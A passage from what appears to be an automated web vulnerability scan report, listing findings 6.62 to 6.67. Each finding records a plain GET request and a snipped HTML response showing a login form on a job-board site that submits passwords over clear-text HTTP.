Set-Cookie: PHPSESSID=k1m7ouon0b4rcae41h2bgg8ig6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133954

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.informationtechnologycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.62. http://www.insurcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insurcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.insurcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ecpq66kc364asgd97g8ralsb30; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 127189

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.insurcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.63. http://www.intellectualpropertycrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intellectualpropertycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.intellectualpropertycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ajhbe62huej7qoq1voq8lsteu4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.intellectualpropertycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.64. http://www.internshipcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internshipcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.internshipcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ol3jscv0r1flgbhg63mnc21c14; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 132111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.internshipcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.65. http://www.j2eecrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.j2eecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.j2eecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ov4jbk2b77peoidd95qi1upha7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111694

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.j2eecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.66. http://www.journalismcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.journalismcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.journalismcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:09 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bai2pstv5ao7rak55ou3up3b17; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:09 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111259

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.journalismcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.67. http://www.lawcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=leverage-300x250\ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gs1oh9i6kad359a0jna6e84qs7; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211139

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur